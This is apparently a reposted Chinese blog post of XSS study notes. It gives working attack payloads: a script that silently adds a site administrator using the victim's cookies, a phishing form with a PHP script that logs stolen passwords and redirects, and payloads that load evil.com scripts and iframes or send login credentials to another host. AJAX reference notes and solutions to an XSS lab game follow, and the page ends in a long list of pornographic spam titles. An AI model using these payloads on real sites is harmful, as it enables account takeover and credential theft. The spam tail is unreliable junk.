
    ?

    請求的URL

    /admin/adminuser/admiuser_add.asp

    請求的POST數(shù)據(jù)

    username=123456&password=123456=password=123456&purview=..........&submit=.........

    ?

    ?

    xssshellcode 如下

    <script>

    var request=false;

    if(window.XMLHttpRequest){

    request=new XMLHttpRequest();

    if(request.overrideMimeType){

    request.overrideMimeType('text/xml');

    }

    }else if(window.ActiveXObject){

    var versions=['Microsoft.XMLHTTP','MSXML.XMLHTTP','Microsoft.XMLHTTP','Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTP.6.0','Msxml2.XMLHTTP.4.0','Msxml2.XMLHTTP.3.0','Msxml2.XMLHTTP'];

    for(var i=0;i<versions.length;i++){

    try{

    request=new ActiveXObject(versions[i])

    }catch(e){}

    }

    }

    xmlhttp=request

    add_admin();

    function add_admin(){

    var url="/admin/adminuser/admiuser_add.asp"; ?//請求地址

    var params="username=xss&password=123456=password=123456&purview=..........&submit=........." ??//提交的數(shù)據(jù),也就是修改密碼的數(shù)據(jù)

    xmlhttp.open("POST",url,true);

    xmlhttp.setRequestHeader("Content-type","application/x-www-form-urlencoded");

    xmlhttp.setRequestHeader("Content-length",params.length);

    xmlhttp.setRequestHeader("Connection","close");

    xmlhttp.send(params);

    }

    ?????上述代碼簡單的利用xmlhttp對象發(fā)送一個POST請求,由于該請求上帶上了被攻擊的COOkie 并一同發(fā)送到服務(wù)端,所以能在后臺悄悄添加一個管理員

    ?

    ?

    ?

    ?

    ?

    做釣魚網(wǎng)站,并且保存密碼后頁面跳轉(zhuǎn)

    ?

    <form action="http://192.168.111.102/stong.php" method="post">

    ?<input type="text" name="user">

    ?<input type="pass" name="pass">

    ?<input type="submit">

    </form>

    ?

    ?

    ?

    ?

    <?php

    $data=fopen("123.txt", "a+");

    @$a=$_POST['user'];

    @$b=$_POST['pass'];

    fwrite($data, $a);

    fwrite($data, $b);

    header("location:http://www.baidu.com");

    ?

    ?>

    接受完頁面以后立馬瞬間跳轉(zhuǎn)到百度

    ?

    ?

    XSS釣魚欺騙

    ??攻擊者在XSS頁面插入利用代碼

    ????????http://www.bug.com/index.php?s=<Script src=http://www.evil.com/xss.js></Script>

    ????????當(dāng)用戶訪問這個鏈接時,就會動態(tài)調(diào)用遠(yuǎn)程的xss.js的文件,該文件的作用是創(chuàng)建一個iframe框架覆蓋目標(biāo)頁面,再加載遠(yuǎn)程域偽造的釣魚頁面

    ?

    ????????這里使用document.body.innerHTML方法插入代碼

    ?

    ??????? document.body.innerHTML=('<div style="position: absolute;top: 0px;left: 0px;width: 100%;height: 100%;">'+'<iframe src=http://www.evil.com/phishing.html ?width="100%;" height="100%">'+'</iframe></div>');

    ???

    這樣的效果就是動態(tài)的調(diào)用了一個自己寫的危害的頁面覆蓋了原本的頁面

    ?

    ?

    ?

    ?

    小補充: forms 集合可返回對文檔中所有 Form 對象的引用。

    語法 document.forms[]

    ?

    ?

    ?

    ?

    ?

    構(gòu)建XSS ?payload 劫持表單和控制web行為

    ??<script>

    ?? form=document.froms["userslogin"];

    ?? form.οnsubmit=function(){

    ?? var iframe=document.createElement("iframe");

    ?? iframe.style.display="none";

    ?? alert(form.user.value);

    ?? iframe.src="http://127.0.0.1/phishing.php?user="+form.user.values+"$pass="+form.pass.value;

    ?? document.body.appendChild(iframe);

    ?? }

    ??</script>

    ??這段代碼用來截取用戶在登錄頁面輸入的用戶名字和密碼信息,然后提交給當(dāng)前創(chuàng)建的PHP腳本

    ?

    沒試過

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    這里詳細(xì)的介紹了ajax

    ?

    ?????方法

    ?????描述

    getALLResponseHeaders()

    ?把HTTP請求所有相應(yīng)收不作為鍵/值對返回

    ?

    ?

    ?

    open(method,url,async)

    ?

    規(guī)定請求的類型、URL 以及是否異步處理請求。

    • method:請求的類型;GET 或 POST
    • url:文件在服務(wù)器上的位置
    • async:true(異步)或 false(同步)

    ?

    ?

    ?send(string)

    ?

    將請求發(fā)送到服務(wù)器。

    • string:僅用于 POST 請求

    ?

    ?

    ?

    setRequestHeader(header,value)

    ?

    向請求添加 HTTP 頭。

    • header: 規(guī)定頭的名稱
    • value: 規(guī)定頭的值

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    XMLHtttpRequest對象的屬性

    ?

    ?

    ??onreadystatechange

    ??

    存儲函數(shù)(或函數(shù)名),每當(dāng) readyState 屬性改變時,就會調(diào)用該函數(shù)。

    readyState

    ?

    存有 XMLHttpRequest 的狀態(tài)。從 0 到 4 發(fā)生變化。

    • 0: 請求未初始化
    • 1: 服務(wù)器連接已建立
    • 2: 請求已接收
    • 3: 請求處理中
    • 4: 請求已完成,且響應(yīng)已就緒

    ?

    responseText

    ??

    ?

    獲得字符串形式的響應(yīng)數(shù)據(jù)。

    ?

    ?responseXML

    ?獲得 XML 形式的響應(yīng)數(shù)據(jù)。

    ?

    ?

    ?

    ???status

    服務(wù)器的相應(yīng)HTTP狀態(tài)碼

    ?

    ?statusText

    ?http狀態(tài)對應(yīng)文本

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    發(fā)送一個GET請求

    ?

    <script>

    ?

    ??function createXHR(){

    ?

    ?? if(typeof XMLHttpRequest !='undefind'){ ???????????//非IE6的創(chuàng)建Ajax的辦法

    ?

    ?? return new XMLHttpRequest();

    ?

    ?? }else if(typeof ActiveXObject !='undefind'){ ??????????//IE6的創(chuàng)建Ajax的辦法

    ?

    ???????????var version=['MSXML2.XMLHttp.6.0','MSXML2.XMLHttp.3.0','MSXML2.XMLHttp']; ???//IE6的xmlhttp版本有很多

    ?

    ???????????for(var i=0;version.length;i++){

    ?

    ??????????? try{

    ?

    ??????????? ?return new ActiveXObject(version[i]); ????????//自己去定義xmlhttp做成一個數(shù)組,遍歷循環(huán),如果認(rèn)識那個版本就去創(chuàng)建,不認(rèn)識肯定會報錯,所以用try catch 跳過報錯的環(huán)節(jié),直接選到瀏覽器符合的版本

    ?

    ??????????? }catch(e){

    ?

    ??????????????//跳過

    ?

    ??????????? }

    ?

    ???????????}

    ?

    ?? }else{

    ?

    ?? throw new Error("您的系統(tǒng)或者瀏覽器不支持ajax") ?????//如果瀏覽器對于數(shù)組里的版本都識別不了,就報錯

    ?

    ?? }

    ?

    ??}

    ?

    ?

    ?

    ?

    ?

    ??var ?xml=createXHR(); //創(chuàng)建XHR請求對象

    ?

    ??xml.open("GET","web/url.php?"+data,true); ?//初始化請求

    ?

    ??xml.send() ??//和服務(wù)器建立鏈接并發(fā)數(shù)據(jù)

    ?

    ?

    ?

    ????????????????

    ?

    </script>

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    發(fā)送POSTajax 請求

    ?

    <script>

    ?

    ??function createXHR(){

    ?

    ?? if(typeof XMLHttpRequest !='undefind'){ ???????????//非IE6的創(chuàng)建Ajax的辦法

    ?

    ?? return new XMLHttpRequest();

    ?

    ?? }else if(typeof ActiveXObject !='undefind'){ ??????????//IE6的創(chuàng)建Ajax的辦法

    ?

    ???????????var version=['MSXML2.XMLHttp.6.0','MSXML2.XMLHttp.3.0','MSXML2.XMLHttp']; ???//IE6的xmlhttp版本有很多

    ?

    ???????????for(var i=0;version.length;i++){

    ?

    ??????????? try{

    ?

    ??????????? ?return new ActiveXObject(version[i]); ????????//自己去定義xmlhttp做成一個數(shù)組,遍歷循環(huán),如果認(rèn)識那個版本就去創(chuàng)建,不認(rèn)識肯定會報錯,所以用try catch 跳過報錯的環(huán)節(jié),直接選到瀏覽器符合的版本

    ?

    ??????????? }catch(e){

    ?

    ??????????????//跳過

    ?

    ??????????? }

    ?

    ???????????}

    ?

    ?? }else{

    ?

    ?? throw new Error("您的系統(tǒng)或者瀏覽器不支持ajax") ?????//如果瀏覽器對于數(shù)組里的版本都識別不了,就報錯

    ?

    ?? }

    ?

    ??}

    ?

    ?

    ?

    ?

    ?

    ??var ?xml=createXHR(); //創(chuàng)建XHR請求對象

    ?

    ??para="id=11&username=diwada&password=12314" ?//發(fā)送的數(shù)據(jù)

    ?

    ??xml.open("GET","web/url.php?"+data,true); ?//初始化請求

    ?

    ??xml.setRequestHeader("Content-Type","application/x-www-form-urlencode");

    ?

    ??xml.send(para) ??//和服務(wù)器建立鏈接并發(fā)數(shù)據(jù)

    ?

    ?

    ?

    ????????????????

    ?

    </script>

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ??????XSS小游戲 游戲答案

    ?

    第一關(guān)唯一和用戶交互的地方就是URL里的參數(shù)

    ?

    嘗試著把參數(shù)修改

    localhost/xss/level1.php?name=<img/src=1 ?οnerrοr='alert("1")'>

    ?

    然后就彈窗了,第一關(guān)過了

    ?

    ?

    ?

    第二關(guān) 表單里的輸入框,只對 ?空格 ?/ 做了轉(zhuǎn)義

    "οnmοuseοver=alert("s") //

    使用”? vlaue 前面的雙引號過濾,添加事件 ???????????// 把后面的過濾

    ?

    達(dá)到一個 移動 彈窗的效果

    ?

    ?

    ?

    第三關(guān)

    "還是<>都跳不出value標(biāo)簽,故我們嘗試別的特殊字符,發(fā)現(xiàn)'號可以跳出標(biāo)

    'οnmοuseοver=alert(/xss/) //

    ?下次如果遇到情況你也可以用單引號試試

    ???

    ?

    第四關(guān)

    "οnmοuseοver=alert(/ss/) //

    ?

    ?

    ?

    第五關(guān)

    ?

    ?

    它把事件加了一個 _ ?所以嘗試著用不需要事件的XSS來彈窗

    ?

    "><a href="javascript:alert('xss')">2</a>//

    “?>閉合前面的 ??// 閉合后面的 ?????????動態(tài)的添加一個a標(biāo)簽

    或者用

    "><iframe src="javascript:alert(1)"></iframe>

    ?

    ?

    ?

    ?

    第六關(guān)

    "ONMOUSEOVER=alert(/ss/) //

    ?

    第七關(guān)

    "><a hrHREFef="javascriSCRIPtpt:alert('ss')">123</a>//

    on href 都進(jìn)行了消除,嘗試著用兩個或者是大小寫來繞過限制

    "> 閉合前面的

    // 消除后面的

    ?

    或者嘗試這樣也可以

    "><span oOnOnnclick="alert('ss')">123</span>// ?

    進(jìn)行繞過

    主要還是看他過濾了那一塊

    或者是" OnoOnNmouseover=alert(`ss`) //

    ?

    ?

    ?

    第八關(guān)

    ri 進(jìn)行了轉(zhuǎn)換 轉(zhuǎn)換成r_i ????所以我對i 進(jìn)行了編碼,

    ?

    ?

    javascript:alert('ss')

    ?

    ?

    整體達(dá)到的效果就是這樣

    ?

    ?

    怎么看有沒有實體編碼

    ?

    第九關(guān)

    對方對ri 進(jìn)行了 r_i

    ””進(jìn)行了實體編碼

    繞過的方法 ????????????????????????????????????????????

    javascript:alert( ` http://`?) ???????????????????`` 這個輸出的方法就是~這個鍵不加shift

    ?i ??是i轉(zhuǎn)化后的效果

    ?

    最終達(dá)成的效果 ?能彈窗

    ?

    ?

    怎樣看到底有沒有被實體編碼? 其實很簡單,例如

    我輸出 javascript:alert("http://") ??利用firbug查看

    ?

    ?

    右擊->編輯HTML 

    ?

    可以看到  "(引號)全部轉(zhuǎn)義了,

    ?

    ?

    現(xiàn)在我嘗試對引號進(jìn)行編碼

    ?

    ?

    ?

    ?

    原來輸出的是 javascript:alert("http://") ?然后對引號進(jìn)行編碼 成為了下面的

    ?????????? javascript:alert("http://")

    再放進(jìn)去

    ?

    可以看到結(jié)果,然后右擊->編輯HTML

    ?

    可以看到,兩個引號還是被轉(zhuǎn)義了, 這就是實體編碼了~~~

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    10關(guān)

    ?

    沒有任何輸出框,我嘗試著對變量進(jìn)行XSS

    ?

    現(xiàn)在通過firebug查看 ?????

    ?

    右擊->編輯HTML

    ?

    可以看到 <> 都被轉(zhuǎn)義了,現(xiàn)在嘗試進(jìn)行編碼看看

    ?

    ?

    這道題目搞了很久,都沒弄明白,所以破例查看的源碼

    ?

    ?

    三個input 都隱藏了,你可以用firebug 打開 ??可以看到,雖然是三個,但是這邊只有name=t_sorf 的能夠傳值, 所以我們要在URL里動態(tài)的添加參數(shù),

    ?

    ?

    可以看到這邊已經(jīng)有值了

    構(gòu)造payload ?使它彈窗

    http://localhost/xss/level10.php?keyword=good%20job!%20&t_sort=kk%22%20οnmοuseοver=alert(/ss/)%20type=%22test%22%20//

    ?

    t_sort=kk”?閉合掉前面的標(biāo)簽

    οnmοuseοver=alert(/ss/) 彈窗

    type=”test”?// ?讓input顯示出來,并且用//閉合掉后面的

    ?

    ?

    然后移到input 就彈窗了

    ?

    ?

    ?

    新增知識點:適當(dāng)?shù)牟榭聪戮W(wǎng)頁的源碼,看看input里是否能傳值,是否被隱藏了

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    11關(guān) ,同樣的也是研究了好幾個小時不明白才看的

    ?

    它這邊對 t_sort 做了實體編碼,不管輸出啥都沒用,但是對HTTP——REFRER ?只做了<> 的替換

    $_SERVER['HTTP_REFERER']; ???就是referer (來源網(wǎng)址)

    ?

    所有可以在referer 里構(gòu)造XSS

    ?

    在這里,我們新建一個tmp1.php頁面

    ?

    內(nèi)容就是提交到 ?level11.php ?(第11關(guān))

    在頁面點擊提交

    ?

    打開burp suite

    通過抓包修改referer

    http://localhost/tmp1.php" οnmοuseοver=alert(/ss/) type="text"//

    ?

    修改成這樣

    ?

    然后再放行就成這樣了

    ?

    構(gòu)造出了一個 ?input ?移到這里就彈窗了

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    12關(guān)

    12關(guān)也是referer ?過濾沒嚴(yán)格,它判斷了來源是什么瀏覽器

    打開firebug 可以看到

    ?

    ?

    ?

    這邊是判斷對方的來源 是什么瀏覽器,我們可以在這里構(gòu)造XSS payload

    ?

    通過11關(guān)跳轉(zhuǎn)到12關(guān)的這個對方,進(jìn)行抓包

    ?

    修改這里的參數(shù)

    Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0)" οnmοuseοver=alert(/ss/) type="text" //

    ?

    ?

    點擊forward 放行

    ?

    ?

    然后12關(guān)就會出現(xiàn) 本來應(yīng)該隱藏的input ???移到哪里就會彈窗

    ?

    ?

    ?

    ?

    ?

    ?

    13關(guān)

    ?

    13關(guān)的關(guān)鍵點在于 t_cook 這個參數(shù)

    它的值是根據(jù)cookie 而定的,所以你可以在線的去修改cookie 的值

    ?

    ?

    ?

    ?

    再對頁面刷新下,就成功了~~

    ?

    ?

    ?

    ?

    14 關(guān)因為現(xiàn)在的一些安全原因,顯示不出來

    ?

    15

    http://bbs.ichunqiu.com/thread-15664-1-1.html

    答案

    ?不玩了,沒意思

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    ?

    轉(zhuǎn)載于:https://www.cnblogs.com/fengzaizhijian/p/6755890.html

    總結(jié)

    以上是生活随笔為你收集整理的xss专用章节的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。

    日韩欧美中文字幕公布 | 免费视频欧美无人区码 | 国产av无码专区亚洲a∨毛片 | 国产99久久精品一区二区 | 久久99精品国产.久久久久 | av在线亚洲欧洲日产一区二区 | 在线看片无码永久免费视频 | 欧美国产亚洲日韩在线二区 | 国产sm调教视频在线观看 | 大肉大捧一进一出好爽视频 | 国产乱人无码伦av在线a | 少妇一晚三次一区二区三区 | 亚洲精品综合一区二区三区在线 | 婷婷五月综合激情中文字幕 | 色偷偷人人澡人人爽人人模 | 少女韩国电视剧在线观看完整 | 国产精品高潮呻吟av久久 | 免费观看激色视频网站 | 亚洲精品国产a久久久久久 | 国产av无码专区亚洲a∨毛片 | 国产精品福利视频导航 | 亚洲爆乳大丰满无码专区 | 国产乱人无码伦av在线a | 精品国产av色一区二区深夜久久 | 日日噜噜噜噜夜夜爽亚洲精品 | 成人精品视频一区二区三区尤物 | 久久天天躁夜夜躁狠狠 | 久久无码人妻影院 | 狠狠色欧美亚洲狠狠色www | 国产麻豆精品精东影业av网站 | 国产精品丝袜黑色高跟鞋 | 玩弄少妇高潮ⅹxxxyw | 国产精品无码mv在线观看 | 亚洲成av人片天堂网无码】 | 俺去俺来也在线www色官网 | 中文字幕无码热在线视频 | 露脸叫床粗话东北少妇 | 无码人妻av免费一区二区三区 | 在线天堂新版最新版在线8 | 国内揄拍国内精品人妻 | 99re在线播放 | 久久人人爽人人爽人人片av高清 | 免费观看激色视频网站 | 激情综合激情五月俺也去 | av小次郎收藏 | 久久人妻内射无码一区三区 | 精品成在人线av无码免费看 | 国产成人精品无码播放 | 嫩b人妻精品一区二区三区 | 国产婷婷色一区二区三区在线 | 久久精品视频在线看15 | 黑人粗大猛烈进出高潮视频 | 人人澡人摸人人添 | 日本xxxx色视频在线观看免费 | 熟妇激情内射com | 亚洲狠狠色丁香婷婷综合 | 欧洲精品码一区二区三区免费看 | 人妻少妇精品视频专区 | 成熟女人特级毛片www免费 | 精品久久久久久人妻无码中文字幕 | 国产麻豆精品精东影业av网站 | 日本又色又爽又黄的a片18禁 | 日本xxxx色视频在线观看免费 | 国产欧美亚洲精品a | 国产黑色丝袜在线播放 | 欧美日韩综合一区二区三区 | 中文精品无码中文字幕无码专区 | 又大又硬又黄的免费视频 | 亚洲第一网站男人都懂 | 中文字幕亚洲情99在线 | 扒开双腿吃奶呻吟做受视频 | 国产亚洲精品久久久久久久 | 九九热爱视频精品 | 又黄又爽又色的视频 | 亚洲综合无码久久精品综合 | 999久久久国产精品消防器材 | 日欧一片内射va在线影院 | 中文字幕无码视频专区 | 亚洲 a v无 码免 费 成 人 a v | 日本成熟视频免费视频 | 国产精品18久久久久久麻辣 | 欧美三级a做爰在线观看 | 精品久久久久久亚洲精品 | 亚洲中文字幕乱码av波多ji | 精品久久久久久亚洲精品 | 激情综合激情五月俺也去 | 少妇人妻av毛片在线看 | 欧美日韩在线亚洲综合国产人 | 夜精品a片一区二区三区无码白浆 | 爆乳一区二区三区无码 | 在线播放亚洲第一字幕 | 一本大道久久东京热无码av | 久久亚洲中文字幕精品一区 | 久久国语露脸国产精品电影 | 欧美xxxxx精品 | 成 人影片 免费观看 | 久久国产精品偷任你爽任你 | 露脸叫床粗话东北少妇 | 国产肉丝袜在线观看 | 成人欧美一区二区三区黑人 | 国产婷婷色一区二区三区在线 | 永久黄网站色视频免费直播 | 国产 精品 自在自线 | 午夜精品久久久久久久久 | 在线观看国产午夜福利片 | 2020久久香蕉国产线看观看 | 亚洲爆乳无码专区 | 色综合久久88色综合天天 | 国产激情无码一区二区 | 又紧又大又爽精品一区二区 | 牲欲强的熟妇农村老妇女视频 | 国产成人精品优优av | 麻豆蜜桃av蜜臀av色欲av | 日本丰满护士爆乳xxxx | 性欧美疯狂xxxxbbbb | 中文字幕精品av一区二区五区 | 久久久久99精品成人片 | 一本大道伊人av久久综合 | 少妇一晚三次一区二区三区 | 老头边吃奶边弄进去呻吟 | 最新国产麻豆aⅴ精品无码 | 扒开双腿吃奶呻吟做受视频 | 亚洲精品一区二区三区在线观看 | 国产高清不卡无码视频 | 国产亚洲tv在线观看 | 熟妇人妻中文av无码 | 成人无码精品1区2区3区免费看 | 亚洲国产综合无码一区 | 一本无码人妻在中文字幕免费 | 成人毛片一区二区 | 亚洲精品久久久久中文第一幕 | av无码久久久久不卡免费网站 | 亚洲人成影院在线观看 | 牛和人交xxxx欧美 | 亚拍精品一区二区三区探花 | 装睡被陌生人摸出水好爽 | 麻豆人妻少妇精品无码专区 | 思思久久99热只有频精品66 | 又色又爽又黄的美女裸体网站 | 少妇性l交大片欧洲热妇乱xxx | 99精品国产综合久久久久五月天 | 图片区 小说区 区 亚洲五月 | 久久精品国产一区二区三区 | 国产成人精品无码播放 | 国产国产精品人在线视 | 日产精品99久久久久久 | 香蕉久久久久久av成人 | 精品国产一区av天美传媒 | 欧洲精品码一区二区三区免费看 | 丝袜足控一区二区三区 | 亚洲精品成人福利网站 | 在线观看欧美一区二区三区 | 亚洲s码欧洲m码国产av | 亚洲精品国偷拍自产在线观看蜜桃 | 国精产品一区二区三区 | 奇米影视7777久久精品 | 国产肉丝袜在线观看 | 国产精品无码久久av | 亚洲精品国产精品乱码视色 | 国产极品视觉盛宴 | 国产人成高清在线视频99最全资源 | 亚洲国产av美女网站 | 丰满妇女强制高潮18xxxx | 无码人妻久久一区二区三区不卡 | 欧美精品免费观看二区 | 国产成人无码av片在线观看不卡 | 亚洲爆乳精品无码一区二区三区 | 激情爆乳一区二区三区 | 国产亚洲精品精品国产亚洲综合 | 国产一区二区三区四区五区加勒比 | 强辱丰满人妻hd中文字幕 | 蜜臀av在线播放 久久综合激激的五月天 | 狂野欧美性猛xxxx乱大交 | 人妻少妇精品无码专区二区 | 亚洲精品久久久久avwww潮水 | 狠狠色丁香久久婷婷综合五月 | 国产精品成人av在线观看 | 特级做a爰片毛片免费69 | 人妻互换免费中文字幕 | 综合人妻久久一区二区精品 | 丁香啪啪综合成人亚洲 | 国内精品久久久久久中文字幕 | 国产猛烈高潮尖叫视频免费 | 无码午夜成人1000部免费视频 | 天天躁夜夜躁狠狠是什么心态 | 天天拍夜夜添久久精品 | 88国产精品欧美一区二区三区 | 欧美日韩亚洲国产精品 | 亚洲精品一区二区三区大桥未久 | 中文字幕乱码人妻二区三区 | 国产高潮视频在线观看 | 国产欧美熟妇另类久久久 | 大胆欧美熟妇xx | 国产人妻大战黑人第1集 | 欧美变态另类xxxx | 欧美亚洲日韩国产人成在线播放 | 国产成人无码av片在线观看不卡 | 老头边吃奶边弄进去呻吟 | 日本熟妇人妻xxxxx人hd | 国产精品办公室沙发 | 一本色道久久综合亚洲精品不卡 | 女人被男人躁得好爽免费视频 | 蜜臀av无码人妻精品 | 日韩精品久久久肉伦网站 | 色狠狠av一区二区三区 | 欧美日韩一区二区免费视频 | 女人高潮内射99精品 | 日本一卡2卡3卡四卡精品网站 | 性色欲网站人妻丰满中文久久不卡 | 欧美xxxxx精品 | 精品无码av一区二区三区 | 欧美亚洲日韩国产人成在线播放 | 狠狠亚洲超碰狼人久久 | 18精品久久久无码午夜福利 | 精品国偷自产在线 | 久久国产36精品色熟妇 | 欧洲熟妇色 欧美 | 无码av最新清无码专区吞精 | 精品夜夜澡人妻无码av蜜桃 | 成人一在线视频日韩国产 | 久久亚洲中文字幕无码 | 97人妻精品一区二区三区 | 欧美日韩在线亚洲综合国产人 | 99久久精品无码一区二区毛片 | 狂野欧美激情性xxxx | 在线天堂新版最新版在线8 | 老熟女重囗味hdxx69 | 在线观看国产一区二区三区 | 秋霞成人午夜鲁丝一区二区三区 | 露脸叫床粗话东北少妇 | 四虎永久在线精品免费网址 | 野狼第一精品社区 | 久青草影院在线观看国产 | 国产成人精品三级麻豆 | 亚洲码国产精品高潮在线 | 久久精品国产一区二区三区 | 九月婷婷人人澡人人添人人爽 | 亚洲欧美精品伊人久久 | 中文字幕精品av一区二区五区 | 国产欧美熟妇另类久久久 | 熟女少妇人妻中文字幕 | 荫蒂被男人添的好舒服爽免费视频 | 久久久久国色av免费观看性色 | 天堂久久天堂av色综合 | 四十如虎的丰满熟妇啪啪 | 内射后入在线观看一区 | 国产三级精品三级男人的天堂 | 国产一精品一av一免费 | 荫蒂被男人添的好舒服爽免费视频 | 欧美国产日韩亚洲中文 | 一个人看的www免费视频在线观看 | 国产av无码专区亚洲a∨毛片 | 小泽玛莉亚一区二区视频在线 | 久久久亚洲欧洲日产国码αv | aⅴ亚洲 日韩 色 图网站 播放 | 国产热a欧美热a在线视频 | 亚洲日韩av一区二区三区四区 | 四虎国产精品一区二区 | 日本熟妇人妻xxxxx人hd | 亚洲色大成网站www | 影音先锋中文字幕无码 | 又紧又大又爽精品一区二区 | 无码精品人妻一区二区三区av | 色爱情人网站 | 日本丰满护士爆乳xxxx | 精品久久久无码中文字幕 | 久久zyz资源站无码中文动漫 | 三级4级全黄60分钟 | 欧美色就是色 | 成人影院yy111111在线观看 | 一本久久伊人热热精品中文字幕 | 午夜性刺激在线视频免费 | 精品无码av一区二区三区 | 亚洲国产成人av在线观看 | 欧美xxxx黑人又粗又长 | 亚洲熟妇自偷自拍另类 | 在线精品亚洲一区二区 | 99久久无码一区人妻 | 国色天香社区在线视频 | 国产乱子伦视频在线播放 | 色婷婷av一区二区三区之红樱桃 | 欧美乱妇无乱码大黄a片 | 精品国产成人一区二区三区 | 欧美亚洲日韩国产人成在线播放 | 国产精品福利视频导航 | 日本丰满护士爆乳xxxx | 亚洲 高清 成人 动漫 | 国产av无码专区亚洲a∨毛片 | 97色伦图片97综合影院 | 国产明星裸体无码xxxx视频 | 亚洲区小说区激情区图片区 | 精品成人av一区二区三区 | 99国产精品白浆在线观看免费 | 欧美日韩一区二区免费视频 | 中文字幕无码av激情不卡 | 日本爽爽爽爽爽爽在线观看免 | 日本一区二区三区免费高清 | 亚洲乱亚洲乱妇50p | 成人精品天堂一区二区三区 | 亚洲精品久久久久中文第一幕 | 国产成人无码av在线影院 | 欧美丰满少妇xxxx性 | 国产午夜手机精彩视频 | 女人和拘做爰正片视频 | 免费无码的av片在线观看 | 国内精品九九久久久精品 | 99精品国产综合久久久久五月天 | 久久99热只有频精品8 | 中文字幕无码日韩欧毛 | 少妇的肉体aa片免费 | 曰本女人与公拘交酡免费视频 | 国産精品久久久久久久 | 在线视频网站www色 | 成人综合网亚洲伊人 | 无码精品人妻一区二区三区av | 男女爱爱好爽视频免费看 | 99视频精品全部免费免费观看 | 亚洲大尺度无码无码专区 | 成人无码视频在线观看网站 | 高清不卡一区二区三区 | 精品国产aⅴ无码一区二区 | 中文久久乱码一区二区 | 人妻体内射精一区二区三四 | 国产精品无码一区二区三区不卡 | 国产成人无码午夜视频在线观看 | 国产熟女一区二区三区四区五区 | 人人妻人人澡人人爽人人精品 | 中文字幕无码视频专区 | 亚洲精品午夜无码电影网 | 乌克兰少妇xxxx做受 | 欧美第一黄网免费网站 | 国产精品理论片在线观看 | 国产激情精品一区二区三区 | a在线亚洲男人的天堂 | 久久无码专区国产精品s | 国产午夜手机精彩视频 | 一个人免费观看的www视频 | 亚洲啪av永久无码精品放毛片 | 国产精品美女久久久网av | 亚洲午夜无码久久 | 亚洲码国产精品高潮在线 | 国产在线一区二区三区四区五区 | 少女韩国电视剧在线观看完整 | 四虎国产精品一区二区 | 又色又爽又黄的美女裸体网站 | 国产成人精品三级麻豆 | 国産精品久久久久久久 | 无码中文字幕色专区 | 中文字幕久久久久人妻 | 爱做久久久久久 | 免费播放一区二区三区 | 成人一区二区免费视频 | 精品人妻av区 | 亚洲国产高清在线观看视频 | 无遮无挡爽爽免费视频 | 精品人妻中文字幕有码在线 | 国产精品永久免费视频 | 永久免费观看国产裸体美女 | 国产精品毛片一区二区 | 国产人成高清在线视频99最全资源 | 2019nv天堂香蕉在线观看 | 野外少妇愉情中文字幕 | 免费国产成人高清在线观看网站 | 欧美人妻一区二区三区 | 未满小14洗澡无码视频网站 | 久久国内精品自在自线 | 久久精品人妻少妇一区二区三区 | 国产在线一区二区三区四区五区 | 国产激情精品一区二区三区 | 亚洲熟妇色xxxxx欧美老妇y | 日本高清一区免费中文视频 | 国产 精品 自在自线 | 人人妻人人澡人人爽精品欧美 | 高潮毛片无遮挡高清免费视频 | 欧美国产日韩亚洲中文 | 精品久久久久久亚洲精品 | 久久精品女人的天堂av | 人人妻人人澡人人爽人人精品 | 少妇愉情理伦片bd | 国产农村妇女aaaaa视频 撕开奶罩揉吮奶头视频 | 国产黄在线观看免费观看不卡 | 成人片黄网站色大片免费观看 | 久久婷婷五月综合色国产香蕉 | 俄罗斯老熟妇色xxxx | 欧美xxxx黑人又粗又长 | ass日本丰满熟妇pics | 日产精品99久久久久久 | 国模大胆一区二区三区 | 樱花草在线播放免费中文 | 成人亚洲精品久久久久 | 蜜桃视频插满18在线观看 | 免费中文字幕日韩欧美 | 国产午夜精品一区二区三区嫩草 | 色婷婷香蕉在线一区二区 | 国产又爽又黄又刺激的视频 | 国产真实伦对白全集 | 鲁大师影院在线观看 | 久久人人爽人人人人片 | 欧美国产日韩久久mv | 亚洲成av人片天堂网无码】 | 日本大香伊一区二区三区 | 中文字幕乱码人妻二区三区 | 永久免费观看美女裸体的网站 | 一本大道伊人av久久综合 | 欧美激情一区二区三区成人 | 午夜精品一区二区三区在线观看 | 久久精品成人欧美大片 | 成 人 网 站国产免费观看 | 丰满人妻翻云覆雨呻吟视频 | 亚洲国产日韩a在线播放 | 亚洲精品一区国产 | 欧美一区二区三区视频在线观看 | 亚洲国产精品毛片av不卡在线 | 无码帝国www无码专区色综合 | 乌克兰少妇性做爰 | 99久久亚洲精品无码毛片 | 西西人体www44rt大胆高清 | 午夜福利试看120秒体验区 | 精品偷拍一区二区三区在线看 | 久久久中文字幕日本无吗 | 国产三级精品三级男人的天堂 | 亚洲国产精品毛片av不卡在线 | 中文字幕av伊人av无码av | 少妇无码av无码专区在线观看 | 福利一区二区三区视频在线观看 | 免费乱码人妻系列无码专区 | 少妇人妻av毛片在线看 | 国产女主播喷水视频在线观看 | 3d动漫精品啪啪一区二区中 | 暴力强奷在线播放无码 | 午夜成人1000部免费视频 | 国精品人妻无码一区二区三区蜜柚 | 任你躁国产自任一区二区三区 | 亚洲色偷偷偷综合网 | 波多野结衣aⅴ在线 | 亚洲啪av永久无码精品放毛片 | 久久综合狠狠综合久久综合88 | 中文字幕人成乱码熟女app | 国产手机在线αⅴ片无码观看 | 国产av剧情md精品麻豆 | 亚洲精品成人福利网站 | 国产精品va在线观看无码 | 国产精品久久久久无码av色戒 | 激情内射亚州一区二区三区爱妻 | 在教室伦流澡到高潮hnp视频 | 亚洲国产精品成人久久蜜臀 | 